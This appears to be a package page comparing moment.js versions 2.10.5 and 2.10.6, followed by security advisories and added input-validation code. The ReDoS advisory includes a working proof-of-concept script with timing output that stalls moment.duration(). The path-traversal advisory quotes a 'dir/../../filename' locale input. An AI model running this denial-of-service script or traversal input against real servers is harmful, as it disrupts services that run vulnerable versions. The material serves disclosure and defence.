Moment.js saw a minor version bump from 2.10.5 to 2.10.6, both iterations focused on providing developers with tools to parse, validate, manipulate, and display dates effectively in JavaScript. Examining the metadata, the core description and infrastructural elements remain consistent, aiming to offer reliable date management. The key difference developers should note is the releaseDate. Version 2.10.6 was released on July 28, 2015, while version 2.10.5 was released on July 26, 2015. This two-day gap suggests that v2.10.6 likely contains bug fixes or very minor enhancements addressing issues discovered quickly after the v2.10.5 release.
For developers deciding which version to use, opting for the newer 2.10.6 is generally advisable as it should incorporate the latest stability improvements. Both versions rely on an identical suite of development dependencies, including tools for testing, linting, code coverage (nyc, karma, qunit, coveralls, grunt-jscs, grunt-contrib-jshint), and build processes (grunt, uglify-js, esperanto). This confirms that the development workflow and standards remained consistent between these versions. Given the minor nature of the update, developers already using 2.10.5 are encouraged to upgrade to 2.10.6 for the best experience.
All known vulnerabilities affecting version 2.10.6 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
```javascript
var moment = require('moment');

// Build a string of `len + 1` copies of `chr`.
// Note: `i` is never declared with `var`, so this loop and the loop below share
// one global `i`; after each call `i` is left at len + 1, which is why the
// printed COUNT values step by 10001 rather than 10000.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
}

// Feed progressively longer digit strings to moment.duration() and time each call.
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start); // [seconds, nanoseconds] spent parsing
  console.log(end);
}
```
```
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. fr, is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
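The advisories above both come down to untrusted strings reaching a moment.js entry point. The following is an added example (not moment.js project code) of the input guards an application would put in front of moment.locale() and moment.duration(): a strict locale-tag check plus an allowlist (the locale names are a constructed sample), and a length cap plus strict ISO 8601 shape check for duration strings. Updating moment remains the real fix; the duration guard is defence in depth.

```javascript
// Added example: guards for untrusted input before it reaches moment.locale()
// and moment.duration(). The allowlist below is a constructed sample; an
// application would list the locales it actually ships.
const ALLOWED_LOCALES = new Set(['en', 'en-gb', 'fr', 'de', 'es', 'ja', 'zh-cn']);

// A locale name is a short BCP 47-style tag: letters/digits separated by single
// hyphens. Anchored, no nested quantifiers, so the check itself runs in linear time.
const LOCALE_TAG = /^[a-z]{2,3}(?:-[a-z0-9]{1,8})*$/;

// Returns the canonical (lower-case) locale name, or null if it must be rejected.
function safeLocale(input) {
  if (typeof input !== 'string' || input.length > 35) return null;
  const name = input.toLowerCase();
  // '.', '/' and '\' never appear in a locale tag, so 'dir/../../filename'
  // style input fails here before any file path could be derived from it.
  if (!LOCALE_TAG.test(name)) return null;
  // Only switch to locales the application knows it ships.
  return ALLOWED_LOCALES.has(name) ? name : null;
}

// Duration strings from users are capped in length (bounding any regex work
// inside the library) and must match a strict ISO 8601 duration such as 'P1DT2H'.
const MAX_DURATION_LEN = 64;
const ISO_DURATION =
  /^-?P(?:\d{1,6}Y)?(?:\d{1,6}M)?(?:\d{1,6}W)?(?:\d{1,6}D)?(?:T(?:\d{1,6}H)?(?:\d{1,6}M)?(?:\d{1,6}(?:\.\d{1,6})?S)?)?$/;

// Returns the string unchanged if it is safe to hand to moment.duration(), else null.
function safeDurationString(input) {
  if (typeof input !== 'string' || input.length > MAX_DURATION_LEN) return null;
  // 'P', 'PT' and similar match the shape but carry no fields; require a digit.
  if (!/\d/.test(input)) return null;
  return ISO_DURATION.test(input) ? input : null;
}

// Usage: const name = safeLocale(req.query.lang); if (name) moment.locale(name);
//        const d = safeDurationString(req.query.ttl); if (d) moment.duration(d);
```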